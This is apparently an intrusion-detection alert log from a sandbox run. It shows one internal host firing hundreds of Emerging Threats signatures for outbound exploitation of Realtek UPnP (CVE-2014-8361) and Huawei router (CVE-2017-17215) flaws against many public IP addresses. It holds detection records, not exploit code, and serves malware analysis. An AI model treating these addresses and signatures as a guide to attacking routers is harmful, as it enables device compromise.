                                      07/20/24-23:01:53.387026TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3473052869192.168.2.2337.133.189.92
                                      07/20/24-23:01:21.915268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207437215192.168.2.23197.207.172.207
                                      07/20/24-23:01:24.575344TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614833252869192.168.2.23166.142.205.252
                                      07/20/24-23:01:20.157619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187837215192.168.2.23197.24.162.140
                                      07/20/24-23:01:42.854322TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4629252869192.168.2.23132.102.241.51
                                      07/20/24-23:01:48.216693TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26093452869192.168.2.23133.159.36.252
                                      07/20/24-23:01:00.633295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792637215192.168.2.23157.32.103.4
                                      07/20/24-23:02:53.715694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613308052869192.168.2.23209.124.7.215
                                      07/20/24-23:01:14.013039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671637215192.168.2.23197.122.119.125
                                      07/20/24-23:01:52.904266TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613581852869192.168.2.2319.191.190.54
                                      07/20/24-23:01:51.086033TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25996852869192.168.2.23106.9.90.86
                                      07/20/24-23:01:44.209629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5576852869192.168.2.23117.174.229.249
                                      07/20/24-23:01:08.560530TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24397652869192.168.2.23157.99.82.194
                                      07/20/24-23:01:03.975418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4170037215192.168.2.2341.142.6.246
                                      07/20/24-23:01:07.016889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053437215192.168.2.23157.126.215.99
                                      07/20/24-23:01:47.856443TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24452652869192.168.2.23201.73.178.106
                                      07/20/24-23:01:06.988055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5107437215192.168.2.23197.247.144.22
                                      07/20/24-23:01:21.952782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5549237215192.168.2.2341.44.152.150
                                      07/20/24-23:01:43.622289TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4237652869192.168.2.2375.212.169.191
                                      07/20/24-23:01:44.520254TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5985852869192.168.2.2338.85.208.126
                                      07/20/24-23:01:43.141970TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615697052869192.168.2.23203.253.92.60
                                      07/20/24-23:01:46.340763TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614072252869192.168.2.2363.243.31.167
                                      07/20/24-23:01:08.607816TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23327652869192.168.2.2334.184.40.220
                                      07/20/24-23:01:41.467111TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615592852869192.168.2.23201.170.107.7
                                      07/20/24-23:01:42.033190TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4864252869192.168.2.23164.216.180.24
                                      07/20/24-23:01:47.248064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5112652869192.168.2.23182.240.112.154
                                      07/20/24-23:01:57.757934TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614759452869192.168.2.23208.150.189.204
                                      07/20/24-23:01:41.392527TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5668652869192.168.2.239.196.233.159
                                      07/20/24-23:01:46.893328TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24716852869192.168.2.2398.147.36.143
                                      07/20/24-23:01:56.270914TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615439652869192.168.2.23171.38.97.128
                                      07/20/24-23:01:04.187171TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615965052869192.168.2.2357.179.102.199
                                      07/20/24-23:00:57.221646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5750237215192.168.2.23157.189.184.171
                                      07/20/24-23:01:11.816521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256637215192.168.2.23197.88.172.221
                                      07/20/24-23:01:50.257796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3923052869192.168.2.23173.68.146.233
                                      07/20/24-23:01:56.828807TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24660852869192.168.2.2343.127.30.131
                                      07/20/24-23:01:12.807585TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24266252869192.168.2.23181.43.61.4
                                      07/20/24-23:01:14.100332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620637215192.168.2.23199.196.42.92
                                      07/20/24-23:01:25.288927TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615168652869192.168.2.2370.161.8.187
                                      07/20/24-23:01:55.428221TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615545052869192.168.2.23180.191.130.65
                                      07/20/24-23:01:31.329969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5971852869192.168.2.2336.125.123.117
                                      07/20/24-23:01:43.260197TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614251452869192.168.2.2364.107.44.177
                                      07/20/24-23:01:34.048825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628437215192.168.2.23197.81.234.224
                                      07/20/24-23:01:53.199976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4827852869192.168.2.2389.25.147.2
                                      07/20/24-23:01:43.260197TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614546452869192.168.2.23146.167.250.116
                                      07/20/24-23:01:02.066908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580437215192.168.2.23197.158.29.84
                                      07/20/24-23:01:42.945747TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614496452869192.168.2.2377.249.102.196
                                      07/20/24-23:01:00.634292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186437215192.168.2.2341.229.84.234
                                      07/20/24-23:01:41.374418TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615830852869192.168.2.23157.9.32.210
                                      07/20/24-23:00:59.163619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315437215192.168.2.23197.252.90.201
                                      07/20/24-23:01:44.602081TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615214052869192.168.2.23150.181.137.93
                                      07/20/24-23:01:42.812448TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615285452869192.168.2.23219.68.37.27
                                      07/20/24-23:01:08.582150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6020852869192.168.2.23189.28.183.134
                                      07/20/24-23:01:43.938688TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614410452869192.168.2.23152.150.124.219
                                      07/20/24-23:02:13.277683TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25229252869192.168.2.2331.110.77.22
                                      07/20/24-23:01:08.634900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25402852869192.168.2.23195.184.165.232
                                      07/20/24-23:02:00.512136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5935252869192.168.2.23120.165.99.108
                                      07/20/24-23:02:00.552327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5683852869192.168.2.2387.120.192.128
                                      07/20/24-23:01:47.410893TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4721852869192.168.2.2394.51.135.205
                                      07/20/24-23:01:42.069870TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3370652869192.168.2.2320.143.101.231
                                      07/20/24-23:01:53.262556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3951452869192.168.2.23109.27.210.57
                                      07/20/24-23:01:02.047411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4531237215192.168.2.2371.112.242.82
                                      07/20/24-23:01:46.490827TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25123252869192.168.2.23112.170.166.3
                                      07/20/24-23:01:51.130270TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615116852869192.168.2.23135.69.136.147
                                      07/20/24-23:01:00.638418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010437215192.168.2.23157.63.197.170
                                      07/20/24-23:01:02.059312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482237215192.168.2.23117.219.119.200
                                      07/20/24-23:01:00.633642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568037215192.168.2.23197.132.243.55
                                      07/20/24-23:01:43.946379TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4632852869192.168.2.23151.244.29.112
                                      07/20/24-23:01:32.028836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851037215192.168.2.23146.240.47.167
                                      07/20/24-23:01:06.990535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565637215192.168.2.23197.81.177.106
                                      07/20/24-23:01:02.059312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070837215192.168.2.23197.29.108.54
                                      07/20/24-23:01:40.294677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801237215192.168.2.23113.91.253.130
                                      07/20/24-23:01:46.423677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5800052869192.168.2.2364.98.234.97
                                      07/20/24-23:01:24.732773TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615308052869192.168.2.2323.131.141.174
                                      07/20/24-23:01:24.889163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555237215192.168.2.23197.216.241.164
                                      07/20/24-23:01:44.881853TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614134452869192.168.2.23223.51.209.65
                                      07/20/24-23:01:03.219817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613448252869192.168.2.2380.176.127.107
                                      07/20/24-23:01:27.666100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683637215192.168.2.2320.160.208.40
                                      07/20/24-23:01:44.295391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4855852869192.168.2.23139.2.152.124
                                      07/20/24-23:01:01.219232TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615874852869192.168.2.23189.63.115.173
                                      07/20/24-23:01:11.630769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759237215192.168.2.2341.211.247.167
                                      07/20/24-23:01:07.066373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772437215192.168.2.2341.154.180.14
                                      07/20/24-23:01:43.007032TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26064052869192.168.2.238.18.22.34
                                      07/20/24-23:01:48.356835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3473452869192.168.2.23175.186.207.187
                                      07/20/24-23:01:20.144672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4589037215192.168.2.23157.44.241.190
                                      07/20/24-23:01:07.033766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6062437215192.168.2.2341.252.100.49
                                      07/20/24-23:01:20.140632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4337437215192.168.2.23197.26.212.186
                                      07/20/24-23:01:45.063335TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5114052869192.168.2.2347.135.155.164
                                      07/20/24-23:01:08.582150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5093052869192.168.2.23124.144.192.144
                                      07/20/24-23:01:42.072139TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25653652869192.168.2.23113.116.9.186
                                      07/20/24-23:01:45.878385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5070852869192.168.2.23190.134.62.33
                                      07/20/24-23:01:45.574617TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4558052869192.168.2.23166.254.78.153
                                      07/20/24-23:01:59.707284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5591852869192.168.2.23137.0.161.120
                                      07/20/24-23:01:42.786028TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3826052869192.168.2.2317.37.38.42
                                      07/20/24-23:01:46.556921TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25091852869192.168.2.2327.31.121.159
                                      07/20/24-23:01:47.808678TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615195452869192.168.2.23133.83.21.166
                                      07/20/24-23:01:51.358348TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5765452869192.168.2.23195.45.218.64
                                      07/20/24-23:01:11.816521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314837215192.168.2.23165.8.237.202
                                      07/20/24-23:01:42.944341TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25142252869192.168.2.23187.178.228.43
                                      07/20/24-23:01:43.160906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3498652869192.168.2.2350.208.25.112
                                      07/20/24-23:01:50.038268TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615156852869192.168.2.23166.125.46.208
                                      07/20/24-23:01:41.443693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4854852869192.168.2.23132.180.52.133
                                      07/20/24-23:01:02.140869TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615954252869192.168.2.2375.207.187.133
                                      07/20/24-23:01:31.976795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901637215192.168.2.23157.98.109.246
                                      07/20/24-23:01:46.471349TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4275252869192.168.2.23173.232.109.220
                                      07/20/24-23:01:40.320408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721437215192.168.2.2341.104.14.193
                                      07/20/24-23:01:31.991548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4910237215192.168.2.23157.161.202.23
                                      07/20/24-23:01:27.708151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5459037215192.168.2.2381.184.225.73
                                      07/20/24-23:01:01.406953TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4397852869192.168.2.23148.117.206.184
                                      07/20/24-23:01:11.642449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430637215192.168.2.23136.52.234.90
                                      07/20/24-23:00:59.175742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961637215192.168.2.23157.134.191.30
                                      07/20/24-23:01:52.425638TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25923252869192.168.2.23133.73.57.190
                                      07/20/24-23:01:41.347676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4610452869192.168.2.23173.176.211.200
                                      07/20/24-23:01:03.486619TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614386252869192.168.2.23209.154.77.145
                                      07/20/24-23:01:00.634089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821637215192.168.2.23197.235.150.198
                                      07/20/24-23:01:42.612377TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26000452869192.168.2.2385.78.48.17
                                      07/20/24-23:01:14.296756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532637215192.168.2.23202.108.222.223
                                      07/20/24-23:01:20.593003TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23305052869192.168.2.2375.68.195.20
                                      07/20/24-23:01:31.977603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5801437215192.168.2.23197.133.236.43
                                      07/20/24-23:01:40.310207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331037215192.168.2.23197.17.28.211
                                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                      2024-07-20T23:01:18.378788+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513837215192.168.2.23197.213.7.238
                                      2024-07-20T23:01:21.240985+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4647052869192.168.2.2364.86.139.164
                                      2024-07-20T23:00:59.181164+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470237215192.168.2.23221.83.41.173
                                      2024-07-20T23:01:18.543930+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274037215192.168.2.23149.227.100.108
                                      2024-07-20T23:01:21.005202+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5040052869192.168.2.23114.20.70.247
                                      2024-07-20T23:01:21.107414+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5923652869192.168.2.2334.184.40.220
                                      2024-07-20T23:01:02.108705+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472837215192.168.2.2341.232.178.1
                                      2024-07-20T23:01:00.658630+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070837215192.168.2.23197.176.41.115
                                      2024-07-20T23:01:19.867575+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5926652869192.168.2.23135.23.236.194
                                      2024-07-20T23:01:09.030401+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3344052869192.168.2.23135.23.236.194
                                      2024-07-20T23:01:20.847594+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4004852869192.168.2.23209.101.108.92
                                      2024-07-20T23:01:21.281290+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4280452869192.168.2.23177.27.5.34
                                      2024-07-20T23:00:59.201622+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459637215192.168.2.2341.119.22.219
                                      2024-07-20T23:01:00.658298+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512037215192.168.2.23197.173.93.85
                                      2024-07-20T23:00:59.218458+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793837215192.168.2.23157.210.25.215
                                      2024-07-20T23:00:59.206164+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913837215192.168.2.23150.124.88.37
                                      2024-07-20T23:01:21.558739+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4736052869192.168.2.2393.10.103.253
                                      2024-07-20T23:01:09.081648+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4056452869192.168.2.23129.27.232.7
                                      2024-07-20T23:01:22.262887+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5207652869192.168.2.23141.31.223.242
                                      2024-07-20T23:01:19.861229+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4070452869192.168.2.2387.1.160.57
                                      2024-07-20T23:00:59.232786+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5149037215192.168.2.2341.75.68.114
                                      2024-07-20T23:00:59.164966+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3624037215192.168.2.23157.231.240.156
                                      2024-07-20T23:01:20.201073+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5730437215192.168.2.23157.58.211.164
                                      2024-07-20T23:01:02.088423+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556237215192.168.2.23164.204.194.37
                                      2024-07-20T23:01:09.206647+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4438252869192.168.2.23108.144.159.228
                                      2024-07-20T23:01:21.202997+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5062052869192.168.2.23152.136.236.137
                                      2024-07-20T23:00:59.181164+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839837215192.168.2.23197.247.106.185
                                      2024-07-20T23:01:21.978629+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5782452869192.168.2.2343.227.14.32
                                      2024-07-20T23:01:19.920436+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5191852869192.168.2.23105.234.100.63
                                      2024-07-20T23:01:21.295537+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5544452869192.168.2.23183.49.28.217
                                      2024-07-20T23:01:21.559701+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4432652869192.168.2.23109.115.27.6
                                      2024-07-20T23:00:59.186953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961637215192.168.2.23157.134.191.30
                                      2024-07-20T23:01:25.607392+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3458852869192.168.2.2313.188.89.36
                                      2024-07-20T23:01:21.014789+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3928052869192.168.2.2397.69.175.230
                                      2024-07-20T23:01:21.194402+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6053037215192.168.2.2341.50.33.93
                                      2024-07-20T23:01:21.177250+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164637215192.168.2.23197.50.46.65
                                      2024-07-20T23:00:59.223718+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5562037215192.168.2.23157.113.182.239
                                      2024-07-20T23:01:18.265358+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819637215192.168.2.23197.77.131.53
                                      2024-07-20T23:01:18.445147+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323037215192.168.2.2346.47.224.132
                                      2024-07-20T23:01:18.252895+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422237215192.168.2.2337.80.86.165
                                      2024-07-20T23:01:00.658630+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5728837215192.168.2.2341.191.248.36
                                      2024-07-20T23:01:20.383814+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4594852869192.168.2.23122.204.212.245
                                      2024-07-20T23:00:59.170218+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745037215192.168.2.23143.28.80.1
                                      2024-07-20T23:01:00.658630+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980637215192.168.2.23197.99.9.223
                                      2024-07-20T23:01:18.293486+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862837215192.168.2.23157.240.255.134
                                      2024-07-20T23:01:20.862093+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3732852869192.168.2.2325.108.103.192
                                      2024-07-20T23:01:21.299570+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4780637215192.168.2.23157.143.234.224
                                      2024-07-20T23:01:18.601452+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411037215192.168.2.2341.81.198.30
                                      2024-07-20T23:00:59.211994+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004037215192.168.2.2341.124.29.47
                                      2024-07-20T23:01:08.919725+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4599252869192.168.2.23199.61.238.254
                                      2024-07-20T23:01:20.835694+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5665252869192.168.2.23219.105.54.148
                                      2024-07-20T23:01:18.361765+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257437215192.168.2.2341.240.149.129
                                      2024-07-20T23:00:59.227759+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965237215192.168.2.2341.240.87.211
                                      2024-07-20T23:01:04.236014+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6063452869192.168.2.23124.254.84.115
                                      2024-07-20T23:00:59.203029+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410437215192.168.2.2341.123.176.91
